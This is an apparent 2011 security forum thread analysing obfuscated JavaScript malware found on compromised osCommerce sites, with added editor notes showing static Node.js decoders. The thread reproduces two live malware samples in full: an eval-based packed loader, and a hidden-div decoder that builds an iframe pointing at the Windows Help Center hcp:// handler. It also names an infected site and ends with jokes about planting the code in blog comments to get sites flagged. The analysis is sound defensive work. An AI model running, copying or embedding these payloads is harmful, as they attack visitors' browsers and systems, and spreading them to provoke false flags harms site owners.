^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-1*5`$e$dP&9/3Q`UJHH!0@&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-5*c*1E&4W3?A%6%b`A@#dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&1DcT@A-3ZQz|&9<c%1|#a%e%f%eT#b `2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1@-4#e!3&3/d!3-6EUE-7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5 fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| 
j4z@!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-6MNK$1&3<9?@#d_!2V@$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/5@O%6NN%a$3w&5Wb$0$1$4KH@>HY/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f@V#aUU%f&6D2ZQ%8wz-3%aU edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`@GF#cE-8&4D3K%a|*a$1%aQ%a&5R6z>*1@M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-0$fXX%3%f%bIR4?@#d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f ^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d `6XPQwwX%8M&3/8*f@$b#6@>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>-3@Y<2#d!0HXE-d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`QMP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l)\\\'",EE!0*9Q>!0#8*2:");"};dk=[] I-r x in v){dk.push(trim(x,v))};e-l(dk 8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q-va/+7<,b>!8?!a@!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d 6\'!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &}; 9unAJAX L dE -q ]+ rN( $R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K= F+ i+ Yt , R$K W + R F W;try{ z.setRequestHeader("Content-Type","application/x-www-form-urlencoded" 5){}} z.onreadystatechange !){switch( #z.readyState){case 1: #L 02: #u 03: #y 04: ;= #z.r (Text; ;XML= #z.r (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#A A)= #A.nodeName; ).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. 
>= ; +#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send( Yt)}} Um ],rg()} a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf *rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)} this g !=function( #self g $kx_ %encodeURIComponent( &e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse )elemNodeName *;ajax g +}else{ ,; - A .try{ z :ActiveXObject("M /Array 0();break;case 2=document.getElementById( 3if( 4true 5)}catch(e 6.split( 7.length 8.join( 9this.r :=new ;self.r ( <T" ,i="?" ,rx="&" ,r =return >value ?=null , @ !){ U A){ C t[key][ G( $j[0], $j[1]) Hvar I;for( J"|| )==" K ,b= 4 ,w=fals L ! MXMLHttpRequest NunR (()} O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open( B, S= $ T-d!3 U} , V%b%a#6Q W, 4) X.XMLHTTP" 5 Y r Z){if( []= /( ]() ^!2* _ L$o, `&0/ awindow d$R A3 e&4/ f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split(' ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A C G H I J K L M N O P Q R S T U V W X Y Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script>

Quote

<html><body><span></span><div style="visibility:hidden"><div>35601666693316601122674717693316601122665816316718043154391414582216
3569312258145822601631041915762216446760754477046975373077345469316704315
4391414584458772211145844586975333414584458697533341160697551047711727172
7271727271727271727271727271727271727271727271727271727271727271727271727
2717272717272717272717272717272717272717272717272717272717272717272717272
7172727172727172727172727172727172727172727172727172727172727172727172727
1727271727271727271727271727271727271727271727271727271727271727271727271
7272717272717272717272717272717272717272717272717272717272717272717272717
2727172727172727172727172727172727172727172727172727172727172727172727172
7271727271727271727271727271727271727271727271727271727271727271727271727
2717272717272717272717272717272717272717272717272715151722632515172263258
4458697533341160697551047711727674745533583516671758311669547766202233221
6422176755362473111206614316622310434664069642270601122662766103005124568
7425482901243005124568742541336964225122732210424230051245687425482901243
0051245687425413734513724582323223104346676166427100477775439141460576904
6054316033205851313411142051540454363327065230222768106642423005124568742
5482901243005124568742541373451372458232322310434660222776634635708484824
6627663216226077224963572231775310010261012806516101280848482410094242300
5124568742548290124300512456874254137345137245823232231043466326064646634
6357084848245149542275531065294810076676166407664060645822094242300512456
8742548290124300512456874254137345137245823232231043466346357464924714242
3005124568742548290124300512456874254137345137245823232231043466582277663
4027716226011662766311622607722346357223177531071203420635102771622601110
0942423005124568742548290124300512456874254137345137245823232231043466323
4755877666020484454223869756016446627665066424230051245687425482901243005
1245687425413734513724582323223104346632347558776660200260352232162260772
2493522161316697722662766066642423005124568742548290124300512456874254137
3451372458232322310434663234755877666020026035223216226077227034772973695
8776627665066664242300512456874254829012430051245687425413734513724582323
2231043466340277162260115177445422662766602048445422386975601644664242300
5124568742548290124300512456874254137345137245823232231043466340277162260
1151345422756642423005124568742548290124300512456874254137345137245823232
2310434663402771622601151591669772266346357084848245116225854347558223834
2044424230051245687425482901243005124568742541373451372458232322310434663
4027716226011515860352277343369642266406964227060112207666020026035223216
2260772270347729736958776642423005124568742548290124300512456874254137345
1372458232322310434663402771622601151316434582242423005124568742548290124
3005124568742541373451372458232322310434665822776634027716226011662766753
4770469753766424230051245687425482901243005124568742541373451372458232322
3104346602227766731164662766703477046975376642423005124568742548290124300
5124568742541373451372458232322310434660222776613580402042264646627663216
2260772249635722317753101302311669547751020422646410096642423005124568742
5482901243005124568742541373451372458232322310434661358040204226464512176
7566406964227060112207667407664816762266424230051245687425482901243005124
5687425413734513724582323223104346602227766400249662766321622607722496357
2231775310023116695477697537514069642202445877221149635722317710096642423
0051245687425482901243005124568742541373451372458232322310434664002495103
2264227722406964226610300512456874254829012430051245687425413734513563581
0664242300512456874254829012430051245687425413734513724580031583116695477
6630051245687425482901243005124568742541373451372458427576646247511622546
4603122531427143707660277166975375133163411320460163234202253525009095116
2254646031225314101437076602771669753751331634113204601632342022535545090
9511622546460312253142314370766027716697537513316341132046016323420225355
1209095116225464603122531436143707660277166975375133163411320460163234202
2535255090951162254646031225314464924711437076602771669753751331634113204
6016323420225368060712450712450712740745520712550750745007505074075074740
9095116225464603122531437245814370766027716697537513316341132046016323420
2253505012075612075050260909511622546460312253144114370766027716697537513
3163411320460163234202253560609095116225464603122531430051245687425143707
6602771669753751331634113204601632342022535568090909251714583116695477421
8424725203431761122757751372277296422112275775838444860377060112253185854
60751809437423516975752216084801286769331660112225</div></div><script>
q="v";
el=document.getElementsByTagName("di"+q)[0];
try{
if (Math.exp(1)===Math.E) throw 'xtNode';
}catch(qq){
with({a:'createTe'}){
k=document[a+qq]("eval");
}
}
q="extNode";
try{
if (Math.exp(1)===Math.E) throw 1;
}catch(qq){
el2=document["createT"+q]("ReferenceError");
w="deVa";
}
e = eval(k.nodeValue);
e("k=el2.no"+w+"lue");
z="|MSDh#2,H)@m8W/qr<\"?dRe]P;5!LE&cCfov{gB:F}>[y4J'TO1.6(p39jswaX\\blG =7iNA%x0nut";
with(document){
qwe=getElementsByTagName("div")[parseInt(Math.SQRT2*Math.SQRT2/2)]['innerHT'+'ML'];
}
s="";
aaa=qwe["len"+"gth"];
w="1";
for (i=0;i!==aaa;i+=2){
q=qwe.substr(i,1)*10+qwe.substr(i+ +w,1)*1;
with({a:s}){
s=a.concat(z["su"+"bstr"](q,1));
}
}
e(s);
</script></body></html>

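Editor's added example, not code from the thread: the second sample above can be read without running it. Its script takes the inner hidden div, walks the digit run two characters at a time, and uses each pair as an index into the 78-character string z; the throw/catch and string-splicing tricks around it only assemble document.createTextNode and a reference to eval. The Node.js block below repeats that indexing on z (copied from the sample) and on the first two wrapped lines of the digit run copied from the post. It assumes the forum wrapped one contiguous digit string (the sample reads innerHTML as a single string, and a newline would have been multiplied to 0 and shifted every later pair), and the HTML wrapper is constructed to mirror the post's markup. The function names are the example's own.

```javascript
// z, copied from the sample with the same escapes (78 characters).
const ALPHABET =
  "|MSDh#2,H)@m8W/qr<\"?dRe]P;5!LE&cCfov{gB:F}>[y4J'TO1.6(p39jswaX\\blG =7iNA%x0nut";

// The first two wrapped lines of the digit run, copied from the post. The
// newline is forum wrapping: the sample reads innerHTML as one string, and
// "\n"*10 would silently become 0 and shift every later pair, so the live page
// must have carried the digits unbroken.
const SAMPLE_DIGITS =
  '35601666693316601122674717693316601122665816316718043154391414582216\n' +
  '3569312258145822601631041915762216446760754477046975373077345469316704315';

// Constructed wrapper mirroring the post's markup: the digits sit in the
// second <div>, which is what getElementsByTagName("div")[1] selects.
const SAMPLE_HTML =
  '<html><body><span></span><div style="visibility:hidden"><div>' +
  SAMPLE_DIGITS + '</div></div><script>/* decoder omitted */</script></body></html>';

// Pull the inner <div> text out of the markup (stand-in for the DOM lookup).
function innerDivText(html) {
  const m = /<div[^>]*>\s*<div>([^<]*)<\/div>/i.exec(html);
  if (!m) throw new Error('hidden inner <div> not found');
  return m[1];
}

// Static version of the sample's loop:
//   q = d[i]*10 + d[i+1];  s += z.substr(q, 1)
// Non-digits are dropped first; a trailing unpaired digit is ignored.
function decodeDigitPairs(digits, alphabet) {
  const clean = digits.replace(/\D/g, '');
  let out = '';
  for (let i = 0; i + 1 < clean.length; i += 2) {
    const q = Number(clean[i]) * 10 + Number(clean[i + 1]);
    out += alphabet.charAt(q); // '' when q is past the alphabet, as substr would give
  }
  return out;
}

// End-to-end: markup in, recovered second stage out, nothing executed.
function decodeSample(html) {
  return decodeDigitPairs(innerDivText(html), ALPHABET);
}

console.log(decodeSample(SAMPLE_HTML));
```

On those two lines the recovered text starts `var iframe='<iframe src="hcp://services/search?query=anything&topic=hc`, so the script builds an iframe whose src is an hcp:// URL, the Windows Help Center protocol handler; that is consistent with what the sandbox run later in the thread reported. Feeding the whole digit run through decodeDigitPairs gives the complete second stage.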
Re: Interesting JS malware
Posted by: pgl
Date: July 11, 2011 09:36AM

Where did you come across this?

Re: Interesting JS malware
Posted by: Skyphire
Date: July 11, 2011 02:58PM

Check: http://www.buenosairesturismo.com.ar/rivadaviabuenosaires/

Looks like an HCP zeroday exploit to me. Didn't have the time to deobfuscate it yet, but while running it in a sandbox it tried to launch the HCP protocol of some sort.

Some 8+ results, it seems fairly new.

http://www.google.com/search?q=%3A"ing.fr"%2CJG*2%25a%25fzV*aV%3A"omCha"%2C>%258%258*2*5LB0_*4%3A"rCode("<6%23fF%253%23f%237%23d_%244y<d*3*6%24eV*e*d%24a*3%266R8%23b!0G%254%23d%25eTM+`8B6P*3K%236>*4HY%2Fc*dPB1JJ-&ie=utf-8

Re: Interesting JS malware
Posted by: Skyphire
Date: July 11, 2011 03:11PM

Oh wait, way more...

http://www.google.com/search?q=a+d+e+f+g+h+j+k'.substr(c-%3D(x%3Dc<2%3F1%3A2)%2Cx))).join(t.pop()))%3Beval(d)&ie=utf-8&oe=utf-8

Now Hackvertor guys, can we crack it or not! ;-)

Re: Interesting JS malware
Posted by: Skyphire
Date: July 11, 2011 03:14PM

It seems due to an osCommerce (webshop) script; they all seem to run it so far.

Re: Interesting JS malware
Posted by: Skyphire
Date: July 12, 2011 04:28AM

It's rhetorical of course, since I know how to do it. But let's assume a company got hacked and you are in charge of deobfuscating it. What would you do and what would you use? Let's say you've got 30 minutes to figure out the threat. Some would use Rhino, but then you need to build Firefox with Rhino, and you need the source right now.

One way of doing it quickly is using this plugin:

https://addons.mozilla.org/en-us/firefox/addon/javascript-deobfuscator/

It deobfuscated it on the fly:

http://pastebin.com/rYUfwFBx



Edited 2 time(s). Last edit at 07/12/2011 04:31AM by Skyphire.

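Editor's added example, not code from the thread or from the add-on: the first sample's outer loader, `for(c=130;c;d=(t=d.split(KEY.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)`, is a dictionary packer. It steps through the key two characters at a time from the end, splits d on each token, pops the trailing segment as that token's expansion, joins it back in, and finally evals the rebuilt string. The Node.js block below packs a constructed, harmless payload with the same scheme (example.invalid is a reserved name that never resolves), unpacks it statically with no eval at all, and also shows the "on the fly" approach: running the loader with eval shadowed by a recorder, which is what a deobfuscating add-on amounts to. The names packSplitJoin, unpackSplitJoin, buildLoader and captureEval are the example's own. The hook variant still executes the loader in the analysis process, so it belongs in a throwaway environment; the static unpacker does not run anything.

```javascript
// Constructed payload: a harmless stand-in for a real second stage.
const PAYLOAD =
  'var f=document.createElement("iframe");' +
  'f.setAttribute("src","http://example.invalid/");' +
  'f.style.visibility="hidden";document.body.appendChild(f);';

// Token -> expansion pairs. Tokens are two characters, like the " X" tokens
// in the real key, and must not occur in the payload.
const DICTIONARY = [
  [' 0', 'document'],
  [' 1', 'iframe'],
  [' 2', 'setAttribute'],
  [' 3', '"src","'],
];

// Inverse of the loader loop; used only to build the sample. Tokens are
// applied in key order, so the loader (which walks the key backwards)
// undoes the last one first.
function packSplitJoin(source, dictionary) {
  let d = source;
  let key = '';
  for (const [token, expansion] of dictionary) {
    if (token.length !== 2) throw new Error('loader steps through the key two chars at a time');
    if (d.includes(token)) throw new Error('token already present: ' + JSON.stringify(token));
    d = d.split(expansion).join(token) + token + expansion;
    key += token;
  }
  return { d, key };
}

// Static re-implementation of
//   for(c=N;c;d=(t=d.split(KEY.substr(c-=(x=c<2?1:2),x))).join(t.pop()));
// Same arithmetic as the loader, but the result is returned, never eval'd.
function unpackSplitJoin(d, key, c) {
  while (c) {
    const x = c < 2 ? 1 : 2;
    c -= x;
    const parts = d.split(key.substr(c, x));
    const expansion = parts.pop();
    d = parts.join(expansion);
  }
  return d;
}

// Wraps packed data in the loader syntax seen on the infected page, with
// var declarations added so the loop does not leak globals when run here.
function buildLoader(d, key) {
  return 'var c,t,x,d=' + JSON.stringify(d) + ';' +
    'for(c=' + key.length + ';c;d=(t=d.split(' + JSON.stringify(key) +
    '.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)';
}

// On-the-fly capture: compile the loader as a sloppy-mode function whose
// first parameter is named eval. The loader's eval(d) then resolves to that
// parameter, so it is an ordinary call that hands d to the recorder instead
// of executing it. The loader itself still runs in this process.
function captureEval(loaderSource) {
  const captured = [];
  const run = new Function('eval', 'document', 'window', loaderSource);
  run(function (code) { captured.push(String(code)); }, {}, {});
  return captured;
}

const packed = packSplitJoin(PAYLOAD, DICTIONARY);
console.log('packed :', packed.d);
console.log('static :', unpackSplitJoin(packed.d, packed.key, packed.key.length));
console.log('hooked :', captureEval(buildLoader(packed.d, packed.key))[0]);
```

For a real sample, paste the page's d, key and starting value of c into unpackSplitJoin and the first stage comes out without ever reaching eval; captureEval is the cross-check for the case where the loop has been varied and the static rewrite no longer matches it.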
Re: Interesting JS malware
Posted by: Gareth Heyes
Date: July 12, 2011 08:24AM

@Skyphire

I would use Hackvertor, but since the sandbox is in a state of pwnage at the minute it wouldn't be very wise to run untrusted JS inside it :D When I know it's securish =) I'd probably use FF proxies to create a fake environment to run the untrusted code in.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Interesting JS malware
Posted by: rsnake
Date: July 29, 2011 08:14PM

FYI, you troublemakers, you with all your being security experts and talking about your fancy security stuff. Stop taunting the Germans with false positives; they get cranky:


> From: <abuse@clean-mx.de>
> To: <support@onr.com>
> Cc: <soc@us-cert.gov>
> Subject: [clean-mx-viruses-931602](207.200.14.141)-->(support@onr.com)
> viruses sites (1 so far) within your network, please close them! status: As
> of 2011-07-29 11:43:00 CEST
> Date: 2011-07-29 05:20:30
>
> > Dear abuse team,
> >
> > please help to close these offending viruses sites(1) so far.
> >
> > status: As of 2011-07-29 11:43:00 CEST
> > http://support.clean-mx.de/clean-mx/viruses.php?email=support@onr.com&response=alive
> >
> > (for full uri, please scroll to the right end ...
> >
> >
> > We detected many active cases dated back to 2007, so please look at the date
> > column below.
> > You may also subscribe to our MalwareWatch list
> > http://lists.clean-mx.com/cgi-bin/mailman/listinfo/viruswatch
> >
> > This information has been generated out of our comprehensive real time
> > database, tracking worldwide viruses URI's
> >
> > most likely also affected pages for these ip may be found via passive dns
> > please have a look on these other domains correlated to these ip
> > example: see http://www.bfk.de/bfk_dnslogger.html?query=207.200.14.141
> >
> > If you review this list of offending sites, please do this carefully, pay
> > attention for redirects also!
> > Also, please consider this particular machines may have a root kit installed !
> > So simply deleting some files or dirs or disabling cgi may not really solve
> > the issue !
> >
> > Advice: The appearance of a Virus Site on a server means that
> > someone intruded into the system. The server's owner should
> > disconnect and not return the system into service until an
> > audit is performed to ensure no data was lost, that all OS and
> > internet software is up to date with the latest security fixes,
> > and that any backdoors and other exploits left by the intruders
> > are closed. Logs should be preserved and analyzed and, perhaps,
> > the appropriate law enforcement agencies notified.
> >
> > DO NOT JUST DELETE THE FILES. IF YOU DO NOT FIX THE SECURITY
> > PROBLEM, THEY WILL BE BACK!
> >
> > You may forward my information to law enforcement, CERTs,
> > other responsible admins, or similar agencies.
> >
> > +-----------------------------------------------------------------------------------------------
> >
> > |date |id |virusname |ip |domain |Url|
> > +-----------------------------------------------------------------------------------------------
> > |2011-07-29 10:30:02 CEST |931602 |JS/Kryptik.BN |207.200.14.141 |ckers.org
> > |http://sla.ckers.org/forum/read.php?24,36702
> > +-----------------------------------------------------------------------------------------------
> >
> >
> > Your email address has been pulled out of whois concerning this offending
> > network block(s).
> > If you are not concerned with anti-fraud measurements, please forward this
> > mail to the next responsible desk available...
> >
> >
> > If you just close(d) these incident(s) please give us a feedback, our
> > automatic walker process may not detect a closed case
> >
> > explanation of virusnames:
> > ==========================
> > unknown_html_RFI_php not yet detected by scanners as RFI, but pure php code
> > for injection
> > unknown_html_RFI_perl not yet detected by scanners as RFI, but pure perl code
> > for injection
> > unknown_html_RFI_eval not yet detected by scanners as RFI, but suspect
> > javascript obfuscating evals
> > unknown_html_RFI not yet detected by scanners as RFI, but trapped by our
> > honeypots as remote-code-injection
> > unknown_html not yet detected by scanners as RFI, but suspicious, may be in rare
> > case false positive
> > unknown_exe not yet detected by scanners as malware, but high risk!
> > all other names malwarename detected by scanners
> > ==========================
> >
> >
> > yours
> >
> > Gerhard W. Recher
> > (Geschäftsführer)
> >
> > NETpilot GmbH
> >
> > Wilhelm-Riehl-Str. 13
> > D-80687 München
> >
> > GSM: ++49 171 4802507
> >
> > Handelsregister München: HRB 124497
> >
> > w3: http://www.clean-mx.de
> > e-Mail: mailto:abuse@clean-mx.de
> > PGP-KEY: Fingerprint: A4E317B6DC6494DCC9616366A75AB34CDD0CE552 id:
> > 0xDD0CE552
> > Location: http://www.clean-mx.de/downloads/abuse-at-clean-mx.de.pub.asc

Re: Interesting JS malware
Posted by: Skyphire
Date: August 11, 2011 03:33PM

Interesting Rsnake... So if we post the code as a comment on some blogs we dislike, the site will be flagged. Black ops! ;-)

Re: Interesting JS malware
Posted by: Gareth Heyes
Date: August 12, 2011 05:07PM

Pretty dumb if the scanner can't recognise script from text, but yeah, pretty fun posting this stuff in comments etc :)

